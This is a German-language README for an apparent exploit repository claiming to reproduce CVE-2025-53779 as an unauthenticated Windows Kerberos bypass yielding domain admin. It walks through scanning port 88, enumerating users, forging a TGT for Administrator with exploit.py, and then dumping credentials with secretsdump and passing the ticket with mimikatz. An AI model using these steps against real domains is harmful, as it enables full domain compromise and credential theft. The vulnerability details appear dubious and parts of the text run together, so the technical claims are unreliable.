
Reproduktion von cve-2025-53779-kerberos_bypass_reproduction
CVSS-Score: 9.8 (Kritisch)
Status: Aktive Ausnutzung in freier Wildbahn
Offenlegung: Microsoft August 2025 Patch Tuesday (Zero-Day)
CVE-2025-53779 ist eine kritische Schwachstelle zur Umgehung der Authentifizierung in der Microsoft Windows Kerberos-Protokollimplementierung. Ein nicht authentifizierter Angreifer kann diese Schwachstelle ausnutzen, um die Kerberos-Authentifizierung vollständig zu umgehen und sich als beliebiger Domänenbenutzer auszugeben – einschließlich Domänenadministratoren – ohne über gültige Anmeldeinformationen oder kryptografisches Material zu verfügen.
Microsoft hat dieser Schwachstelle eine CVSS-Bewertung von 9.8 (Kritisch) zugewiesen, aufgrund seiner geringen Angriffskomplexität, nicht erforderlicher Privilegien, nicht erforderlicher Benutzerinteraktion und des Potenzials für eine vollständige Kompromittierung von in die Domäne eingebundenen Systemen.
Die Schwachstelle befindet sich im Kerberos Key Distribution Center (KDC)-Dienst (kdsvc.dll) auf Windows-Domänencontrollern. Konkret ermöglicht ein Validierungslogikfehler in der Überprüfungsroutine des Privilege Attribute Certificate (PAC) einem Angreifer, eine AS-REQ- oder TGS-REQ-Nachricht zu erstellen, die die standardmäßigen Authentifizierungsprüfungen umgeht.
kdsvc.dllDer KDC validiert das Feld pac-signature-data in der PAC-Struktur nicht ordnungsgemäß, wenn bestimmte Flags im Kerberos-Nachrichtenrumpf gesetzt sind. Indem der Angreifer eine speziell präparierte AS-REQ mit einem manipulierten PA-PAC-REQUEST-Padata-Typ und einem gefälschten Autorisierungsdateneintrag sendet, täuscht er den KDC so, dass dieser ein Ticket-Granting-Ticket (TGT) für einen beliebigen Benutzerprinzipalnamen (UPN) ausstellt, ohne den entsprechenden Langzeitschlüssel zu benötigen.
Der Angriff umgeht die Vorauthentifizierung (das Flag REQUIRES_PRE_AUTH wird effektiv ignoriert) und überspringt die PAC-Überprüfung vollständig, sodass das erzeugte Ticket beliebige Gruppenmitgliedschaften enthalten kann (z. B. Domain Admins, Enterprise Admins).
Alle unterstützten Versionen von Windows Server sind vor dem Sicherheitsupdate vom August 2025 betroffen:
| Windows-Version | Betroffen | Behobenes Update |
|---|---|---|
| Windows Server 2025 | ✅ Ja | KB5044289 |
| Windows Server 2022 | ✅ Ja | KB5044285 |
| Windows Server 2019 | ✅ Ja | KB5044277 |
| Windows Server 2016 | ✅ Ja | KB5044293 |
| Windows Server 2012 R2 | ✅ Ja | KB5044297 |
| Windows Server 2012 | ✅ Ja | KB5044291 |
| Windows Server 2008 R2 (ESU) | ✅ Ja | KB5044301 |
| Windows Server 2008 (ESU) | ✅ Ja | KB5044303 |
Hinweis: Windows-Clientversionen (Windows 10, Windows 11) sind nicht betroffen, da sie den KDC-Dienst nicht ausführen.
impacket-Bibliothekexploit.py)pip install impacket pycryptodome
Oder mit der bereitgestellten requirements.txt:
pip install -r requirements.txt
Verwenden Sie Nmap, um Kerberos-Dienste zu erkennen:
nmap -sU -p 88 --script krb5-enum-users <target-ip>
Oder verwenden Sie den integrierten Kerberos-Scan:
python exploit.py --scan <target-ip>
Wenn Sie die Domänenbenutzer nicht kennen, zählen Sie sie per Kerberos-AS-REP-Roasting oder LDAP auf:
python exploit.py --enum <target-ip> <domain>
Erzeugen Sie ein gefälschtes TGT für einen Zielbenutzer:
python exploit.py --dc-ip <dc-ip> --domain <domain> --target-user <username>
Beispiel:
python exploit.py --dc-ip 192.168.1.10 --domain corp.local --target-user Administrator
Das Exploit gibt eine Ticketdatei im Kirbi-Format aus. Verwenden Sie Impacket-Tools zur Überprüfung:
# Export the ticket
set KRB5CCNAME=ticket.kirbi
# Use the ticket to access a resource
python examples/secretsdump.py -k -no-pass <domain>/Administrator@<target>
Sobald ein gültiges TGT erlangt wurde, können Sie:
secretsdump.py -k -no-pass domain/Administrator@<dc>mimikatz "kerberos::ptt ticket.kirbi"Das beiliegende exploit.py implementiert den folgenden Angriffsablauf:
PA-PAC-REQUEST-Feld und manipulierten Autorisierungsdatenkdsvc.dll auslösenAttacker Domain Controller (KDC)
| |
| AS-REQ (forged PA-PAC-REQUEST) |
| - cname: Administrator |
| - sname: krbtgt/DOMAIN |
| - padata: PA-PAC-REQUEST + |
| forged auth-data |
|------------------------------------->|
| |
| [Vulnerable Path] |
| 1. KDC receives AS-REQ |
| 2. Checks PA-PAC-REQUEST flag |
| 3. **Bypasses pre-auth check** |
| 4. Skips PAC verification |
| 5. Generates TGT with arbitrary |
| groups via auth-data |
| |
| AS-REP (forged TGT) |
| - Encrypted with krbtgt key |
| - Contains forged PAC |
|<-------------------------------------|
| |
| TGS-REQ (use forged TGT) |
| - Request service ticket |
| - For any service (CIFS, LDAP, |
| HTTP, HOST) |
|------------------------------------->|
| |
| TGS-REP (service ticket) |
| - Legitimate service ticket |
| - Attacker can now access |
| any resource |
|<-------------------------------------|